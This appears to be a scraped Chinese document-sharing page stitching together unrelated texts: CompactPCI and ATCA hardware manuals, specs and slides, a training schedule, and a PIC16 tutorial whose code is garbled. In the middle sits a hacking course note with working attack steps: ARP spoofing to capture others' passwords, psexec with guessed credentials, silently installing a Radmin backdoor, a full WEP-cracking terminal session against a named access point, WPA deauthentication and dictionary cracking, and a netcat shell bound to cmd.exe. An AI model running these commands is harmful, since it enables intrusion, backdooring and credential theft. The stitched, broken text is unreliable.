PICMG 2.16 R1.0 Packet Switching Backplane Specification
- 格式:pdf
- 大小:3.59 MB
- 文档页数:80
CPCI79616U CompactPCI通用刀片用户手册北京阿尔泰科技发展有限公司产品研发部修订版权所有本文归北京阿尔泰科技发展有限公司版权所有(2011),内容受版权保护。
阿尔泰科技发展有限公司保留所有权利,未经书面授权不得以任何方式对文中内容进行任何形式的复制免责声明由于产品可靠性、设计和功能可能会改进等原因,文中内容可能在未事先通知的情况下发生更改。
本公司对此将不承担任何法律责任。
在任何情况下,对于使用(或无力使用)产品或文档而造成的直接、间接、特殊、偶然或必然损害(即使已经告知用户存在发生这些损害的可能性),本公司均不承担法律责任。
商标PC和VGA是国际商业机器公司(IBM)的注册商标。
Intel®Core™2 Duo是Intel公司的注册商标。
Windows®XP、Windows®7是微软公司的注册商标。
PCIExpress®、PCIe®和PCI-X®是互连外围设备专业组(PCI-SIG)的注册商标。
AMI®是AmericanMegatrendsInc.有限公司的注册商标。
Realtek©和RTL8111是Realtek半导体公司的注册商标。
文中提及的产品名称可能是相应公司的商标或注册商标,在文中仅用于产品标识。
目录目录 (1)1 产品说明 (3)1.1 产品介绍 (3)1.2 产品特点 (3)1.3 详细说明 (4)1.3.1 硬件配置说明 (4)1.3.2 机械尺寸 (5)1.3.2.1 规格(单位mm) (5)1.3.2.2 重量(带散热器) (6)1.3.3 电气特性 (6)1.3.3.3 RTC电池 (6)1.3.4 环境特性 (6)1.3.4.1 运行温度 (6)1.3.4.2 运行湿度 (6)1.3.4.3 存储温度 (6)1.3.4.4 存储湿度 (6)2 硬件资源介绍 (7)2.1 板卡图示 (7)2.2 指示灯及开关 (7)2.2.1指示灯 (7)2.2.2 开关 (8)2.3 连接件 (8)2.3.1 连接件(接口)列表 (8)2.3.2 连接件(接口)设置 (8)2.3.2.1 串口(JCOM1) (8)2.3.2.2 硬盘接口(J2) (8)2.3.2.3 4个USB接口(JUSB2~JUSB5) (9)2.3.2.4 2个LAN(RJ-2~RJ-3) (10)2.3.2.5 DVI(JDVI1) (10)2.3.2.6 CF(CN7) (11)2.3.2.7 内存插槽(DIMM1) (12)2.4 CPCI连接器 (14)2.4.1 J54连接器 (14)2.4.2 J58连接器 (15)2.4.3 J60连接器 (16)2.4.4 J61连接器 (17)3 硬件安装 (18)3.1 安装可移除SATA硬盘 (18)4 BIOS设置 (20)4.1 BIOS简介 (20)4.2 BIOS基本设置 (20)4.3 主板BIOS设置 (21)CPCI7961用户手册版本:6.0134.3.1 串口的设置 (21)4.3.2 Boot设置 (23)4.3.3 Restore on AC Power loss的设置 (24)5 驱动程序的安装以及售后事项 (25)5.1 驱动文件的安装 (25)5.2 售后事项 (25)北京阿尔泰科技发展有限公司1 产品说明CPCI7961是由阿尔泰科技开发的一款高性能、低功耗的单板计算机,产品具有稳定可靠的特点,是工厂自动化、交通运输、军事应用等领域的理想选择。
研祥智能科技股份有限公司文件名称:CPCI测试规范编号:版本:页次:编写:审核:批准批准//日期:1.依据标准1.1.GB/T3047.2-1992高度进制为44.45mm(即1U)的面板、机架和机柜基本尺寸系列1.2.GB/T2822-1991标准尺寸1.3.CPCI相关规范PICMG 2.0R3.0:CompactPCI SpecificationPICMG 2.1R2.0:CompactPCI Hot Swap SpecificationPICMG 2.3R1.0:PMC on CompactPCIPICMG 2.5R1.0H.110:CompactPCI Computer telephony SpecificationPICMG 2.7R1.0:CompactPCI6U Dual System SlotPICMG 2.9R1.0:CompactPCI System Management SpecificationPICMG 2.10R1.0:Keying of CompactPCI Boards and BackplanesPICMG 2.11R1.0:CompactPCI Power Interface SpecificationPICMG 2.16R1.0:Packet Switching Backplane SpecificationIEEE1101.1标准的主板与主板间的位置关系2.CPCI主板测试:2.1.主板基本接口功能测试:具体参照具体接口对应的测试规范,如《USB接口测试规范》、《SATA接口测试规范》、《LAN接口测试规范》等。
2.2.CPCI基本规范测试:2.3.PICMG 2.1R2.0:CompactPCI Hot Swap Specification2.2.1.1热插拔操作步骤(主板烧录CPLD程式,运行主板热插拔软件)2.2.1.1.1CPCI卡热拔出时,先按下拉手条上的热插拔信号键后软件对话框提示有设备拔出,CPCI卡热插拔蓝色灯亮后,将CPCI卡拔出,要求系统正常运行且不能出现提示重启的对话框、或死机现象;在设备理器中CPCI卡的驱动可以卸载.2.2.1.1.2CPCI卡热插入过程时,热插拔蓝色灯亮后完全插入卡,软件对话框提示有设备插入,完全扣好接手条上的热插拔信号键,科技股份有限公司编号:版本:页次:要求系统正常运行且不能出现提示重启的对话框、或死机现象,驱动可以加载上,CPCI卡功能正常.2.2.1.2热插拔的技术要求2.2.1.2.1热替换:在X槽拔出CPCI卡,驱动自动卸载;在X槽插入CPCI卡,驱动自动加载.(没有热插拔软件时,需要在设备管理中”扫描检测硬件改动”),驱动加载后CPCI卡功能应正常。
Alex Lee Director, Product Development CenterADLINK Technology Inc.alex.lee@•ATCA Applications•ADLINK ATCA Building Blocks2•ATCA Technology & Building Blocks•ATCA Applications•ADLINK ATCA Building Blocks3–Reduce time to market, time to revenue, time to volume, time to profit–Reduce development costs–Allow manufacturers of communications equipment to focus on their value add4them–Data transports required exceeded capability ofexisting architectures•Reduction in workforce in some parts of the world reduced the engineering pool available to solve the problem56CostFeaturesWhat to do?–Defines Chassis, Blade, Management•Service Availability Forum (SA Forum)–Application Interface and Hardware Platform interface specifications –Abstract the Application –Hardware layer•Open Source Development Lab (OSDL)–Carrier Grade LinuxTogether these standards offer the Building Blocksof next generation platforms78•ATCA Applications•ADLINK ATCA Building Blocks910l Data Transport Definition on Fabric ChannelPacket Routing Switch (PRS) for AdvancedTCA1112released January 2004–Adds shelf manager cross connects so that a single ShMC and Switch are not tied together•PICMG 3.0 Revision 2.0 released March 2005•PICMG 3.0 R2.0 ECN-002 released April 2006•Backplane capacity•Power distribution system•Hardware management13•Reliable, fully redundant support•Scalable and flexible•RASM features•Distributed 48V power system141516AdvancedTCA*171819•Manage power, cooling, hotswap and interconnect •IPMI–IPMI 1.5 + ATCA extensions•Electronic Keying (E-Keying)–Prevent damage to boards, mis-operation –Enables/disables backplane connections•“Shelf FRU Info ”describes the backplane links•“Board FRU Info ”describes the link types support for each port•Based on protocol compatibility of the end points of each backplane link •Future-proof for new fabric protocols•LIB for Application•SNMP•Command line interface (CLI)–via COM or Ethernet•Web based interface20•Not sufficient for some applications–On the horizon•10GbE–Too expensive today, but getting more cost effective •Advanced Switching (PICMG 3.4)–Need management software21–Allow users to mix and match functions based onthe application–Better utilization of ATCA board•Advanced Mezzanine Card can be used to add some I/O flexibility22system•Advanced Mezzanine Cards will be used inATCA and in backplane like systems to provideI/O modularity23•ATCA Applications•ADLINK ATCA Building Blocks242526Source: RHKRouter•ATCA Applications•ADLINK ATCA Building Blocks2829•E7520 Chipset–Dual Channel DDR2-400 PC3200 Registered/ECC DIMM –Maximum Capacity 16GB –Dual 64bit/66,133MHz PCI/PCI-X Capable PMC Sites, with One PIM Support –Built-in Two Staged Watchdog Timer –On-board Compact Flash, ATA-100 and SATA 2.5”HDD –Front Panel Access Dual 10/100/1000BASE-T Ports –Front Panel Access Serial Console•PICMG 3.1 Compliance–Two Base Interface 10/100/1000BASE-T Channels–Four Fabric Interface 1000BASE-BX Channels–PICMG 3.1 Option 1/2 Configurable30–Dual 2.5”SATA HDD Kits–PIM (VITA-36)–Legacy PS/2 Keyboard and Mouse, Serial COM, and USB Ports•Available Board Support Packages–MontaVista ®Carrier Grade Linux LSP–WindRiver ®VxWorksv5.5 BSP31•E7520 Chipset–Dual Channel DDR2-400 PC3200 Registered/ECC DIMM –Maximum Capacity 16GB –One PCI/PCI-X 32/64bit, 33/66/100/133MHz PMC Site –Built-in Two Staged Watchdog Timer –On-board Compact Flash –Optional On Board 2.5”UDMA HDD Shared Location with PMC –Optional Single Channel SATA Shared Location with PMC –Front Panel Access Serial Console –Front Panel Access Dual Fiber Channel Ports•PICMG 3.1 Compliance –Two Base Interface 10/100/1000BASE-T Channels–Two Fabric Interface 1000BASE-BX Channels–Two 4Gbps Fiber Channel Ports, Front Panel or Fabric Interface Channels –PICMG 3.1 Option 1/4/7 Configurable–Dual 2.5”SATA HDD Kits–Legacy PS/2 Keyboard and Mouse, Serial COM, and USB Ports•Available Board Support Packages–MontaVista®Carrier Grade Linux LSP–WindRiver®VxWorks v5.5 BSP32–Redundant Shelf Manager Ethernet and Switch-to-Switch Connections–One Additional Front Panel RJ-45 Access 1Gbps Port•Fabric Interface–Fourteen 1000BASE-BX Ports for 14 Slots Dual Star Fabric Interface Backplane–PICMG 3.1 Option 1 Compliant–Three Additional Front Panel RJ-45 Access 1Gbps Ports–Eight Additional Rear Transition Module Access 1Gbps Ports–Two Additional Front Panel Access 10Gbps Uplink Ports•Control Plane–Intel®80219 I/O Processor 600MHz, XScale®Core–DDR-200 System Memory up to 1GB–32MB Flash Storage–Front Panel RJ-11 Access Serial Configuration Port3334– 5 Rear Transition Module Slots–Two Shelf Manager Slots in 4U Width, 6HP Pitch Form Factor•Full Mesh Fabric Interface Backplane (aBP-5050)–Redundant IPMB Bus Topology •Push-Pull Dual Fan Trays –90 CFM Air Flow Per Slot (Simulation)–Hot Swappable Design •Redundant PEM w/ Circuit Breaker –Additional 1U AC110/220 to DC48V 1000W Power Bank*•Compatible Shelf Manager§ADLINK ®aCMM-2000§INTEL ®MPCMM0002* (Q4’06)•Redundant Shelf Manager Design•Front Panel Access–Dual 10/100BASE-T Ethernet to Fabric ShMC Ports–RJ-45 Serial Configuration Port–DB-15 Telco Alarm Connector–LED: Alarms (Minor, Major, Critical), Status (Active/Standby), User Defined 3x •Hardware Monitoring–PWM Fan Speed Control, Tachometer Reading–Remote/Local Temperature Sensor–Dumb PEM Monitor35Thank you.36。
1、creative ideaHackerCIA--信息安全概念Confidentality:保密性Top secret /secret /confidential / pulic or classifiedSniffer:攻击技术加密:防御技术Intergirty:完整性HashAvailability :可用性Controllability:可控性mtd<1day3AAuthentication:身份验证deauthenticaion1、static user&password2、pki/ca3、two factor authentication(pin+token code)4、finger生物识别Authorization:授权Subject ---------------------objectAcl(access control list)Dac(discretionary access control 自由的访问控制)Mac(mandatory access control 强制的访问控制)Subject & object一一对应关系Rbac(Role base access control 角色访问控制)SysadminRule base access control 给予规则的访问控制)Accounting/audit:记账审核SyslogUDP 0.0.0.0:514 *:*Arp (address resolve protocol) ip----mac应用层传输层网络层链路层Rarp(revserse arp) mac----ip1、WiresharkWinpcap--使网卡变成混杂模式需要管理员权限、以太网有线网卡而无线网卡是处于monitor mode在capture filter:tcp/udp/arp/ip在display filter:ftp/telnet/http/tcp/udp/arp如果看arp数据包eth.addr==mac如果看ip数据包ip.addr==ip2、能捕获到自己访问ftp的用户名与密码3、能否捕获别人的用户名与密码,并说明原因Cain:apr(arp posion routing) 、暴力破解密码选择升级winpcap1、configure--选择网卡和工作模式2、start sniffer (按钮)--mac scanner3、apr4、在password标签,查看密码如果是full-routing:双向欺骗成功如果是half-routing: 如果客户端数据包是0 ,说明客户端arp防火墙如果网关数据包是0,说明路由器arp防护Xp_cmdshell1、地址已经被占用2、地址冲突相同的ip有不同的mac,就会出现地址冲突Arp 不能跨vlan,不能跨router三层网关交换机Port-isolate port vlan1Pppoe服务器的创建步骤1、interface/print2、设定ip地址Add address=10.1.1.1 netmask=255.255.255.03、ip pool (地址池)4、ppp--pppoe--添加pppoe服务器/注意service name5、Ppp--profile 添加profile6、Ppp--secrets 添加用户名与密码1、检测具有管理员权限主机2、检测网卡模式3、抓包,分析(没有mac&ip spoofing)4、用solarwinds 查看每个interface 的arp cache网络层扫描sTsSsFCnsafer.rarNmap.exe -sT/sS/sF -v 172.19.1.236Redbutton.exePass.bat 字典文件ip 用户名在c盘下生成一个pass.txtPsexec.exe \\ip -u administrator -p 12345 cmd.exe/前提对方主机默认配置为admin$打开在攻击主机上开始tftp服务器在psexec窗口执行上传操作Tftp -i tftp服务器ip地址get (put方向不一样)r_server.exe/raddrv.dll/admdll.dll/aaa.reg 安装后门r_server.exe /install /silencer_server.exe /port:9999 /pass:111 /save /silenceRegedit /s aaa.regNet start r_server用netstat -an 确认端口开启用radmin客户端去连接控制反弹型木马1、花生壳、免费域名无线网络破解1、通讯的安全=算法*密钥*协议Networkstumble 1、bssid:mac 2、essid:名字3、channel 4、encryption 加密类型wep/wpa/wpa22、用omnipeek抓包破解wep 64b ---- 400000Wep 128b ------1m3、用winaircrack 破解捕获的数据包Windwos平台破解Bt3破解如果fake authentication 不能功-o 10Last login: Sun Dec 7 03:19:36 2008 from 172.19.1.211Linux 2.6.21.5.bt ~ # aireplay-ngAireplay-ng 1.0 rc1 r1083 - (C) 2006,2007,2008 Thomas d'OtreppeOriginal work: Christophe Devineusage: aireplay-ng <options> <replay interface>Filter options:-b bssid : MAC address, Access Point-d dmac : MAC address, Destination-s smac : MAC address, Source-m len : minimum packet length-n len : maximum packet length-u type : frame control, type field-v subt : frame control, subtype field-t tods : frame control, To DS bit-f fromds : frame control, From DS bit-w iswep : frame control, WEP bit-D : disable AP detectionReplay options:-x nbpps : number of packets per second-p fctrl : set frame control word (hex)-a bssid : set Access Point MAC address-c dmac : set Destination MAC address-h smac : set Source MAC address-g value : change ring buffer size (default: 8)-F : choose first matching packetFakeauth attack options:-e essid : set target AP SSID-o npckts : number of packets per burst (0=auto, default: 1) -q sec : seconds between keep-alives-y prga : keystream for shared key authArp Replay attack options:-j : inject FromDS packetsFragmentation attack options:-k IP : set destination IP in fragments-l IP : set source IP in fragmentsTest attack options:-B : activates the bitrate testsource options:-i iface : capture packets from this interface-r file : extract packets from this pcap fileattack modes (Numbers can still be used):--deauth count : deauthenticate 1 or all stations (-0)--fakeauth delay : fake authentication with AP (-1)--interactive : interactive frame selection (-2)--arpreplay : standard ARP-request replay (-3)--chopchop : decrypt/chopchop WEP packet (-4)--fragment : generates valid keystream (-5)--caffe-latte : query a client for new IVs (-6)--cfrag : fragments against a client (-7)--test : tests injection and quality (-9)--help : Displays this usage screenNo replay interface specified.bt ~ # ifconfig -aeth0 Link encap:Ethernet HWaddr 00:0C:29:4A:BF:A9inet addr:172.19.1.200 Bcast:172.19.255.255 Mask:255.255.0.0UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1RX packets:3475 errors:0 dropped:0 overruns:0 frame:0TX packets:4434 errors:0 dropped:0 overruns:0 carrier:0collisions:0 txqueuelen:1000RX bytes:292204 (285.3 KiB) TX bytes:3357741 (3.2 MiB)Interrupt:16 Base address:0x2000lo Link encap:Local Loopbackinet addr:127.0.0.1 Mask:255.0.0.0UP LOOPBACK RUNNING MTU:16436 Metric:1RX packets:0 errors:0 dropped:0 overruns:0 frame:0TX packets:0 errors:0 dropped:0 overruns:0 carrier:0collisions:0 txqueuelen:0RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)wlan0 Link encap:UNSPEC HWaddr 00-C0-CA-1E-E2-B4-00-00-00-00-00-00-00-00-00-00UP BROADCAST NOTRAILERS RUNNING PROMISC ALLMULTI MTU:1500 Metric:1RX packets:8840 errors:0 dropped:0 overruns:0 frame:0TX packets:0 errors:0 dropped:0 overruns:0 carrier:0collisions:0 txqueuelen:1000RX bytes:1233831 (1.1 MiB) TX bytes:0 (0.0 b)bt ~ # aireplay-ng -1 0 -a 00:1f:33:d3:7c:f4 -h 00:C0:CA:1E:E2:B4 wlan003:31:37 Waiting for beacon frame (BSSID: 00:1F:33:D3:7C:F4) on channel 103:31:37 Sending Authentication Request (Open System) [ACK]03:31:37 Authentication successful03:31:37 Sending Association Request [ACK]03:31:37 Association successful :-) (AID: 1)bt ~ # aireplay-ngAireplay-ng 1.0 rc1 r1083 - (C) 2006,2007,2008 Thomas d'Otreppe Original work: Christophe Devineusage: aireplay-ng <options> <replay interface>Filter options:-b bssid : MAC address, Access Point-d dmac : MAC address, Destination-s smac : MAC address, Source-m len : minimum packet length-n len : maximum packet length-u type : frame control, type field-v subt : frame control, subtype field-t tods : frame control, To DS bit-f fromds : frame control, From DS bit-w iswep : frame control, WEP bit-D : disable AP detectionReplay options:-x nbpps : number of packets per second-p fctrl : set frame control word (hex)-a bssid : set Access Point MAC address-c dmac : set Destination MAC address-h smac : set Source MAC address-g value : change ring buffer size (default: 8)-F : choose first matching packetFakeauth attack options:-e essid : set target AP SSID-o npckts : number of packets per burst (0=auto, default: 1)-q sec : seconds between keep-alives-y prga : keystream for shared key authArp Replay attack options:-j : inject FromDS packetsFragmentation attack options:-k IP : set destination IP in fragments-l IP : set source IP in fragmentsTest attack options:-B : activates the bitrate testsource options:-i iface : capture packets from this interface-r file : extract packets from this pcap fileattack modes (Numbers can still be used):--deauth count : deauthenticate 1 or all stations (-0)--fakeauth delay : fake authentication with AP (-1)--interactive : interactive frame selection (-2)--arpreplay : standard ARP-request replay (-3)--chopchop : decrypt/chopchop WEP packet (-4)--fragment : generates valid keystream (-5)--caffe-latte : query a client for new IVs (-6)--cfrag : fragments against a client (-7)--test : tests injection and quality (-9)--help : Displays this usage screenNo replay interface specified.bt ~ # aireplay-ng -5 -b 00:1f:33:d3:7c:f4 -h 00:C0:CA:1E:E2:B4 wlan003:33:40 Waiting for beacon frame (BSSID: 00:1F:33:D3:7C:F4) on channel 1 03:33:40 Waiting for a data packet...Read 210 packets...Size: 107, FromDS: 0, ToDS: 1 (WEP)BSSID = 00:1F:33:D3:7C:F4Dest. MAC = 00:1F:33:D3:7C:F4Source MAC = 00:0C:F1:21:5E:EB0x0000: 0841 d500 001f 33d3 7cf4 000c f121 5eeb .A....3.|....!^.0x0010: 001f 33d3 7cf4 0039 1c24 f400 9af4 0dbb ..3.|..9.$......0x0020: 0ca8 ebf1 e460 1a05 fb96 943f d1e5 819d .....`.....?....0x0030: a7bb 241b 3db4 517a 935d 82e6 d851 beca ..$.=.Qz.]...Q..0x0040: 7257 d1f2 e17d 4715 6116 90cf 83cd d987 rW...}G.a.......0x0050: 772f 6675 26d6 76d6 99f1 08d8 b8ec c13e w/fu&.v........>0x0060: e495 2a0a c933 90d9 4330 e3 ..*..3..C0.Use this packet ? ySaving chosen packet in replay_src-1207-033342.cap03:33:48 Data packet found!03:33:48 Sending fragmented packet03:33:48 Got RELAYED packet!!03:33:48 Trying to get 384 bytes of a keystream03:33:48 Got RELAYED packet!!03:33:48 Trying to get 1500 bytes of a keystream03:33:48 Got RELAYED packet!!Saving keystream in fragment-1207-033348.xorNow you can build a packet with packetforge-ng out of that 1500 bytes keystream bt ~ # packetforge-ngPacketforge-ng 1.0 rc1 r1083 - (C) 2006,2007,2008 Thomas d'Otreppe Original work: Christophe Devine and Martin BeckUsage: packetforge-ng <mode> <options>Forge options:-p <fctrl> : set frame control word (hex)-a <bssid> : set Access Point MAC address-c <dmac> : set Destination MAC address-h <smac> : set Source MAC address-j : set FromDS bit-o : clear ToDS bit-e : disables WEP encryption-k <ip[:port]> : set Destination IP [Port]-l <ip[:port]> : set Source IP [Port]-t ttl : set Time To Live-w <file> : write packet to this pcap file-s <size> : specify size of null packet-n <packets> : set number of packets to generateSource options:-r <file> : read packet from this raw file-y <file> : read PRGA from this fileModes:--arp : forge an ARP packet (-0)--udp : forge an UDP packet (-1)--icmp : forge an ICMP packet (-2)--null : build a null packet (-3)--custom : build a custom packet (-9)--help : Displays this usage screenPlease specify a mode.bt ~ #packetforge-ng -0 -a 00:1f:33:d3:7c:f4 -h 00:C0:CA:1E:E2:B4 -l 255.255.255.255 -k 255.255.255.255 -y /root/frfragment-1020-130603.xor fragment-1108-025108.xor fragment-1130-070213.xorfragment-1028-071313.xor fragment-1112-081947.xor fragment-1206-053848.xorfragment-1028-084211.xor fragment-1125-061640.xor fragment-1207-033348.xorbt ~ # packetforge-ng -0 -a 00:1f:33:d3:7c:f4 -h 00:C0:CA:1E:E2:B4 -l 255.255.255.255 -k 255.255.255.255 -y /root/fragment-1207-033348.xor -r taiyuanarp wlan0open failed: No such file or directorybt ~ # packetforge-ng -0 -a 00:1f:33:d3:7c:f4 -h 00:C0:CA:1E:E2:B4 -l 255.255.255.255 -k 255.255.255.255 -y /root/fragment-1207-033348.xor -w taiyuanarp wlan0Wrote packet to: taiyuanarpbt ~ # aireplay-ngAireplay-ng 1.0 rc1 r1083 - (C) 2006,2007,2008 Thomas d'OtreppeOriginal work: Christophe Devineusage: aireplay-ng <options> <replay interface>Filter options:-b bssid : MAC address, Access Point-d dmac : MAC address, Destination-s smac : MAC address, Source-m len : minimum packet length-n len : maximum packet length-u type : frame control, type field-v subt : frame control, subtype field-t tods : frame control, To DS bit-f fromds : frame control, From DS bit-w iswep : frame control, WEP bit-D : disable AP detectionReplay options:-x nbpps : number of packets per second-p fctrl : set frame control word (hex)-a bssid : set Access Point MAC address-c dmac : set Destination MAC address-h smac : set Source MAC address-g value : change ring buffer size (default: 8)-F : choose first matching packetFakeauth attack options:-e essid : set target AP SSID-o npckts : number of packets per burst (0=auto, default: 1) -q sec : seconds between keep-alives-y prga : keystream for shared key authArp Replay attack options:-j : inject FromDS packetsFragmentation attack options:-k IP : set destination IP in fragments-l IP : set source IP in fragmentsTest attack options:-B : activates the bitrate testsource options:-i iface : capture packets from this interface-r file : extract packets from this pcap fileattack modes (Numbers can still be used):--deauth count : deauthenticate 1 or all stations (-0)--fakeauth delay : fake authentication with AP (-1)--interactive : interactive frame selection (-2)--arpreplay : standard ARP-request replay (-3)--chopchop : decrypt/chopchop WEP packet (-4) --fragment : generates valid keystream (-5)--caffe-latte : query a client for new IVs (-6)--cfrag : fragments against a client (-7)--test : tests injection and quality (-9)--help : Displays this usage screenNo replay interface specified.bt ~ # aireplay-ng -2 -b 00:1f:33:d3:7c:f4 -h 00:C0:CA:1E:E2:B4No replay interface specified."aireplay-ng --help" for help.bt ~ # aireplay-ng -2 -x 1024 -b 00:1f:33:d3:7c:f4 -h 00:C0:CA:1E:E2:B4 -r /root/taiyuanarp wlan0Size: 68, FromDS: 0, ToDS: 1 (WEP)BSSID = 00:1F:33:D3:7C:F4Dest. MAC = FF:FF:FF:FF:FF:FFSource MAC = 00:C0:CA:1E:E2:B40x0000: 0841 0201 001f 33d3 7cf4 00c0 ca1e e2b4 .A....3.|.......0x0010: ffff ffff ffff 8001 8268 cb00 f50e 9369 .........h.. (i)0x0020: b050 8f87 9697 48ad 5237 d0de ad4b 0d4f .P....H.R7...K.O0x0030: 4f31 d217 feb0 2b52 b1a3 b8fa a535 9bca O1....+R.....5..0x0040: b3ac a461 ...aUse this packet ? ySaving chosen packet in replay_src-1207-033730.capYou should also start airodump-ng to capture replies.End of file.bt ~ #bt taiyuan # aircrack-ng *.ivsOpening taiyuan-01.ivsRead 9753 packets.# BSSID ESSID Encryption1 00:1F:33:D3:7C:F4 sony WEP (9751 IVs)2 00:60:B3:33:7C:01 Shanxi University Wireless UnknownIndex number of target network ? 1Opening taiyuan-01.ivsAttack will be restarted every 5000 captured ivs.Starting PTW attack with 10666 ivs.破解wpaaireplay-ng -0 5 -a 00:1f:33:d3:7c:f4 -c 00-1B-77-11-1D-11 wlan0aircrack-ng *.ivs -w /root/wordlist.txt (hash 彩虹表)/需要抓到一次完整的四次handshake 才可以缓冲区溢出1、在a主机上nc.exe -l -p 8000 在b主机telnet ip_a 80002、在a主机上nc.exe -l -p 9000 -t -e c:\windows\system32\cmd.exe 。
CompactPCI总线技术概述2006-07-121、CompactPCI总线核心技术1997年8月,PICMG发布了第一个CompactPCI技术标准PICMG 2.0 Rev. 1.0,CompactPCI Specification。
1997年9月发布了PICMG 2.0 Rev. 2.1。
1999年10月发布了PICMG 2.0 Revision 3.0。
PICMG 2.0 R3.0是CompactPCI总线的核心标准,也是CompactPCI技术的精髓。
它由三项领先技术综合而成:·PCI局部总线的电气特性(PCI Local Bus Specification, PCISIG)。
·工业级欧洲卡封装结构和规格(IEC 60297-3 and –4, Eurocard Specification; IEEE 1101.11, IEEE Standard for Additional Mechanical Specifications for Microcomputers Using IEEE 1101.1 Equipment Practice)。
·IEC 2mm高密度针孔连接器(IEC-61076-4-101, Specification for 2mm Connector Systems)。
PICMG 2.0 Revision 3.0规定了背板上各插槽之间,系统槽与背板,I/O模板与背板之间严格的互连关系;定义了背板、模板和前后面板的结构和尺寸;定义P1支持32位PCI操作,P1和P2支持64位PCI操作,P3、P4和P5留给用户使用或作为总线扩展用。
规范还为33MHz和66MHz工作频率的Clock信号分布,定义了严格的设计规则。
规范还定义了系统管理总线,并为背板上每个插槽定义了唯一对应的物理地址。
CompactPCI系统由金属外壳和前、后面板组成的整体导电以及ESD电路设计,使得CompactPCI具有电磁辐射屏蔽和静电释放能力,表现出良好的电磁兼容性。
PICMG 技术应用培训(秦皇岛) 技术应用培训(秦皇岛)课程安排地点 燕大宾馆 大堂 时 间 9:30—11:30 13: 30—14: 30 14: 30—14: 40 开幕仪式 领导致辞 PICMG 简介和规范概况 简介和规范概况 PICMG 1.0 32bitPCI / PICMG 1.2 64bitPCI-X 项 报到时间 目 讲师PICMG 2.0/2.1/2.11/2.14/2.15/2.16/2.17/2.2 Compact PCI 热插拔/电源接口/多处理器/背板包交换 Cpsb/星型结构 7 月 15 日 ( 周 四) 燕山大学 图书馆 14: 40—15: 30 PICMG 2.2/2.5/2.7/2.9 串行网状背板/H.110 CT BUS/6U 双系统插槽/系统管理总线 PICMG 2.8 PXI 规范 PCI (mPCI) -—PICMG 3.0 PCI-X ; 104 -—104+ (PMC) ; 计算机总线和测量总线发展历史及趋势 ISA -—休息 凌华科技简介及凌华产品线概况 凌华科技简介及凌华产品线概况 CompactPCI 相关产品及应用介绍演示 相关产品及应用介绍演示 PCI 总线系统结构 08: 40—10: 10 讲解 PCI 总线系统结构和工作机理,介绍几种常用的 PCI-PCI 桥及 其设计方法,介绍 PCI 总线板卡的信号定义和设计要求,以及 PMC 子板简介。
10: 10—10: 25 燕山大学 7 月 16 日 ( 周 五) 专家楼 会议室 12: 00—14: 30 14: 30—16: 10 16: 10—16: 30 16: 30—17: 40 10: 25—12: 00 休息 CompactPCI 设计规范 设计规范(1) CompactPCI 系统结构;底板设计规则;I/O 板设计规则; 系统板的电气要求;机械规范。
午餐休息 CompactPCI 设计规范 设计规范(2) CompactPCI 以太网封包交换背板;系统管理规范;串形互联规范。
PIC16程序设计及应用PIC16程序设计及应用简介PIC16(Peripheral Interface Controller)是一种微控制器,由美国Microchip公司推出。
它采用RISC架构,具有较低的功耗、高速执行、丰富的外设等特点。
PIC16系列微控制器常应用于各种嵌入式系统中,例如家电控制、汽车电子、安防设备等领域。
本文档将介绍PIC16程序设计的基本概念及应用。
PIC16架构概述PIC16微控制器采用Harvard结构,具有独立的程序存储器和数据存储器。
它采用8位指令集,具有128个字节的RAM和4KB的闪存。
PIC16还拥有多种外设,例如定时器、串口通信接口、模拟比较器等。
PIC16程序设计基础1. 开发环境搭建要进行PIC16程序设计,首先需要安装PIC16开发环境。
Microchip官方提供了一款集成开发环境MPLAB X,可以用于编写、调试和PIC16程序。
安装完成后,还需要配合相应型号的编程器才能对PIC16进行编程。
2. 编写第一个程序下面将介绍一个简单的PIC16程序示例。
首先,我们需要创建一个新的源文件并命名为`mn.c`。
```cinclude <xc.h>void mn(void) {TRISBbits.TRISB0 = 0; // 将RB0引脚设置为输出模式 while (1) {TB0 = 1; // 将RB0引脚输出高电平__delay_ms(1000); // 延时1秒TB0 = 0; // 将RB0引脚输出低电平__delay_ms(1000); // 延时1秒}}```上述程序使用了XC8编译器提供的部分库函数。
首先,我们将RB0引脚设为输出模式,并在一个无限循环中不断将RB0引脚输出高低电平。
3. 编译和程序编译PIC16程序可通过MPLAB X提供的编译器进行,具体方法如下:1. 打开MPLAB X并创建一个新的项目。
2. 将前面编写的`mn.c`文件添加到项目中。